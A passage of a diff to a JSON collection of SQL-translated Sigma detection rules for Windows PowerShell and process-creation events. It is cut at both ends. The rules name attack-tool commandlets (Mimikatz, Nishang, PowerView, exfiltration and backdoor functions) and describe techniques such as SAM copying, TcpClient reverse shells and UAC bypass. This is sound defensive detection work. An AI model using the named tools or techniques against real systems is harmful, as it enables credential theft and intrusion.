AND ScriptBlockText LIKE '%-Namesp%' ESCAPE '\\' AND ScriptBlockText LIKE '%-NameSe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\' AND CommandLine LIKE '%System32\\\\config\\\\sam%' ESCAPE '\\' AND (CommandLine LIKE '%Copy-Item%' ESCAPE '\\' OR CommandLine LIKE '%cp $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%cpi $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%copy $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%.File]::Copy(%' ESCAPE '\\'))" ], - "filename": "posh_ps_add_dnsclient_rule.yml" + "filename": "proc_creation_win_powershell_sam_access.yml" }, { - "title": "Malicious PowerShell Commandlets - ScriptBlock", - "id": 
"89819aa4-bbd6-46bc-88ec-c7f7fe30efa6", - "status": "test", - "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", - "author": "Sean Metcalf, Florian Roth, Bartlomiej Czyz @bczyz1, oscd.community, Nasreddine Bencherchali, Tim Shelton, Mustafa Kaan Demir, Georg Lauenstein, Max Altgelt, Tobias Michalski, Austin Songer", + "title": "Potential Powershell ReverseShell Connection", + "id": "edc2f8ae-2412-4dfd-b9d5-0c57727e70be", + "status": "stable", + "description": "Detects usage of the \"TcpClient\" class. Which can be abused to establish remote connections and reverse-shells. As seen used by the Nishang \"Invoke-PowerShellTcpOneLine\" reverse shell and other.", + "author": "FPT.EagleEye, wagga, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.discovery", - "attack.t1482", - "attack.t1087", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1069.001", - "attack.t1069.002", - "attack.t1069", "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "In rare administrative cases, this function might be used to check network connectivity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Add-Exfiltration%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-Persistence%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Check-VM%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR ScriptBlockText LIKE '%Decrypt-Hash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Do-Exfiltration%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%Exploit-Jboss%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-Fruit%' ESCAPE '\\' OR ScriptBlockText 
LIKE '%Find-GPOLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ChromeDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-FoxDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-GPPPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-IndexedItem%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Keystrokes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LSASecret%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PassHashes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RickAstley%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Screenshot%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServicePermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-System%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Unconstrained%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VaultCredential%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR 
ScriptBlockText LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%HTTP-Login%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-SSP%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Certify%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DAFT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DCSync%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Farmer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Gopher%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Grouper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-InteractiveSystemPowerShell%' 
ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Lockless%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MITM6%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PortScan%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PSInject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RunAs%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR ScriptBlockText LIKE 
'%Invoke-SCShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Sharp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-StandIn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tater%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Whisker%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WireTap%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR ScriptBlockText LIKE '%MailRaider%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-HoneyHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-InMemoryModule%' ESCAPE 
'\\' OR ScriptBlockText LIKE '%Out-Minidump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Port-Scan%' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerBreach%' ESCAPE '\\' OR ScriptBlockText LIKE '%powercat %' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerUp%' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerView%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Update%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-MacAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-Wallpaper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Show-TargetScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-CaptureServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR ScriptBlockText LIKE '%VolumeShadowCopyTools%' ESCAPE '\\') AND NOT (((ScriptBlockText LIKE '%Get-SystemDriveInfo%' ESCAPE '\\' OR ScriptBlockText LIKE '%C:\\\\ProgramData\\\\Amazon\\\\EC2-Windows\\\\Launch\\\\Module\\\\%' ESCAPE '\\')) OR (ScriptBlockText LIKE '# Copyright 2016 Amazon.com, Inc. or its affiliates. All Rights Reserved%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND (CommandLine LIKE '% Net.Sockets.TCPClient%' ESCAPE '\\' AND CommandLine LIKE '%.GetStream(%' ESCAPE '\\' AND CommandLine LIKE '%.Write(%' ESCAPE '\\'))" ], - "filename": "posh_ps_malicious_commandlets.yml" + "filename": "proc_creation_win_powershell_reverse_shell_connection.yml" }, { - "title": "Request A Single Ticket via PowerShell", - "id": "a861d835-af37-4930-bcd6-5b178bfb54df", - "status": "test", - "description": "utilize native PowerShell Identity modules to query the domain to extract the Service Principal Names for a single computer.\nThis behavior is typically used during a kerberos or silver ticket attack.\nA successful execution will output the SPNs for the endpoint in question.\n", - "author": "frack113", + "title": 
"Fsutil Suspicious Invocation", + "id": "add64136-62e5-48ea-807e-88638d02df1e", + "status": "stable", + "description": "Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc).\nMight be used by ransomwares during the attack (seen by NotPetya and others).\n", + "author": "Ecco, E.M. Anhaus, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1558.003" + "attack.defense_evasion", + "attack.t1070" ], "falsepositives": [ - "Unknown" + "Admin activity", + "Scripts and administrative tools used in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.IdentityModel.Tokens.KerberosRequestorSecurityToken%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR OriginalFileName = 'fsutil.exe') AND (CommandLine LIKE '%deletejournal%' ESCAPE '\\' OR CommandLine LIKE '%createjournal%' ESCAPE '\\'))" ], - "filename": "posh_ps_request_kerberos_ticket.yml" + "filename": "proc_creation_win_fsutil_usage.yml" }, { - "title": "Potential Invoke-Mimikatz PowerShell Script", - "id": "189e3b02-82b2-4b90-9662-411eb64486d4", - "status": "experimental", - "description": "Detects Invoke-Mimikatz PowerShell script and alike. 
Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords.", - "author": "Tim Rauch", + "title": "Blue Mockingbird", + "id": "c3198a27-23a0-4c2c-af19-e5328d49680e", + "status": "test", + "description": "Attempts to detect system changes made by Blue Mockingbird", + "author": "Trent Liffick (@tliffick)", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.execution", + "attack.t1112", + "attack.t1047" ], "falsepositives": [ - "Mimikatz can be useful for testing the security of networks" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%DumpCreds%' ESCAPE '\\' AND ScriptBlockText LIKE '%DumpCerts%' ESCAPE '\\') OR ScriptBlockText LIKE '%sekurlsa::logonpasswords%' ESCAPE '\\' OR (ScriptBlockText LIKE '%crypto::certificates%' ESCAPE '\\' AND ScriptBlockText LIKE '%CERT\\_SYSTEM\\_STORE\\_LOCAL\\_MACHINE%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%sc config%' ESCAPE '\\' AND CommandLine LIKE '%wercplsupporte.dll%' ESCAPE '\\') OR (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '%COR\\_PROFILER' ESCAPE '\\')))" ], - "filename": "posh_ps_potential_invoke_mimikatz.yml" + "filename": "proc_creation_win_malware_blue_mockingbird.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher - PowerShell", - "id": "73e67340-0d25-11eb-adc1-0242ac120002", + "title": "Dllhost.EXE Execution Anomaly", + "id": "e7888eb1-13b0-4616-bd99-4bc0c2b054b9", "status": "experimental", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects a \"dllhost\" process spawning with no commandline arguments which is very rare to happen and could indicate 
process injection activity or malware mimicking similar system processes.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1055" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\"\\{\\d\\}.+-f.+\"')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%dllhost.exe' ESCAPE '\\' AND Image LIKE '%\\\\dllhost.exe' ESCAPE '\\')" ], - "filename": "posh_ps_invoke_obfuscation_clip.yml" + "filename": "proc_creation_win_dllhost_no_cli_execution.yml" }, { - "title": "Suspicious PowerShell Keywords", - "id": "1f49f2ab-26bc-48b3-96cc-dcffbc93eadf", - "status": "test", - "description": "Detects keywords that could indicate the use of some PowerShell exploitation framework", - "author": "Florian Roth (Nextron Systems), Perez Diego (@darkquassar)", + "title": "HackTool - SharPersist Execution", + "id": "26488ad0-f9fd-4536-876f-52fea846a2e4", + "status": "experimental", + "description": "Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1053" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%System.Reflection.Assembly.Load($%' ESCAPE '\\' OR ScriptBlockText LIKE '%[System.Reflection.Assembly]::Load($%' ESCAPE '\\' OR ScriptBlockText LIKE '%[Reflection.Assembly]::Load($%' 
ESCAPE '\\' OR ScriptBlockText LIKE '%System.Reflection.AssemblyName%' ESCAPE '\\' OR ScriptBlockText LIKE '%Reflection.Emit.AssemblyBuilderAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Runtime.InteropServices.DllImportAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%SuspendThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%rundll32%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\SharPersist.exe' ESCAPE '\\' OR Product = 'SharPersist') OR (CommandLine LIKE '% -t schtask -c %' ESCAPE '\\' OR CommandLine LIKE '% -t startupfolder -c %' ESCAPE '\\') OR (CommandLine LIKE '% -t reg -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\') OR (CommandLine LIKE '% -t service -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\') OR (CommandLine LIKE '% -t schtask -c %' ESCAPE '\\' AND CommandLine LIKE '% -m add%' ESCAPE '\\')))" ], - "filename": "posh_ps_susp_keywords.yml" + "filename": "proc_creation_win_hktl_sharpersist.yml" }, { - "title": "PowerShell PSAttack", - "id": "b7ec41a4-042c-4f31-a5db-d0fcde9fa5c5", + "title": "Suspicious PowerShell Parent Process", + "id": "754ed792-634f-40ae-b3bc-e0448d33f695", "status": "test", - "description": "Detects the use of PSAttack PowerShell hack tool", - "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", + "description": "Detects a suspicious or uncommon parent processes of PowerShell", + "author": "Teymur Kheirkhabarov, Harish Segar", "tags": [ "attack.execution", "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Other scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PS ATTACK!!!%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%tomcat%' ESCAPE '\\' OR (ParentImage LIKE 
'%\\\\amigo.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\browser.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\chrome.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\firefox.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\jbosssvc.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\microsoftedgecp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MicrosoftEdgeSH.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\outlook.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\safari.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sqlagent.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sqlserver.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sqlservr.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\')) AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR (CommandLine LIKE '%/c powershell%' ESCAPE '\\' OR CommandLine LIKE '%/c pwsh%' ESCAPE '\\') OR Description = 'Windows PowerShell' OR Product = 'PowerShell Core 6' OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')))" ], - "filename": "posh_ps_psattack.yml" + "filename": "proc_creation_win_powershell_susp_parent_process.yml" }, { - "title": "Malicious Nishang PowerShell Commandlets", - "id": "f772cee9-b7c2-4cb2-8f07-49870adc02e0", - "status": "experimental", - "description": "Detects Commandlet names and arguments from the Nishang exploitation framework", - "author": "Alec Costello", + "title": "TrustedPath UAC Bypass Pattern", + "id": "4ac47ed3-44c2-4b1f-9d51-bf46e8914126", + "status": "test", + "description": 
"Detects indicators of a UAC bypass method by mocking directories", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-ConstrainedDelegationBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Copy-VSS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Create-MultipleSessions%' ESCAPE '\\' OR ScriptBlockText LIKE '%DataToEncode%' ESCAPE '\\' OR ScriptBlockText LIKE '%DNS\\_TXT\\_Pwnage%' ESCAPE '\\' OR ScriptBlockText LIKE '%Do-Exfiltration-Dns%' ESCAPE '\\' OR ScriptBlockText LIKE '%Download\\_Execute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Download-Execute-PS%' ESCAPE '\\' OR ScriptBlockText LIKE '%DownloadAndExtractFromRemoteRegistry%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpCerts%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpCreds%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpHashes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-DuplicateToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-Duplication%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-Command-MSSQL%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-DNSTXT-Code%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-OnTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%ExetoText%' ESCAPE '\\' OR ScriptBlockText LIKE '%exfill%' ESCAPE '\\' OR ScriptBlockText LIKE '%ExfilOption%' ESCAPE '\\' OR ScriptBlockText LIKE '%FakeDC%' ESCAPE '\\' OR ScriptBlockText LIKE '%FireBuster%' ESCAPE '\\' OR ScriptBlockText LIKE '%FireListener%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Information %' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PassHints%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Web-Credentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WebCredentials%' ESCAPE '\\' OR ScriptBlockText LIKE 
'%Get-WLAN-Keys%' ESCAPE '\\' OR ScriptBlockText LIKE '%HTTP-Backdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AmsiBypass%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BruteForce%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CredentialsPhish%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Decode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Encode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Interceptor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-JSRatRegsvr%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-JSRatRundll%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MimikatzWDigestDowngrade%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NetworkRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellIcmp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellUdp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Prasadhak%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PSGcat%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsGcatAgent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SessionGopher%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SSIDExfil%' ESCAPE 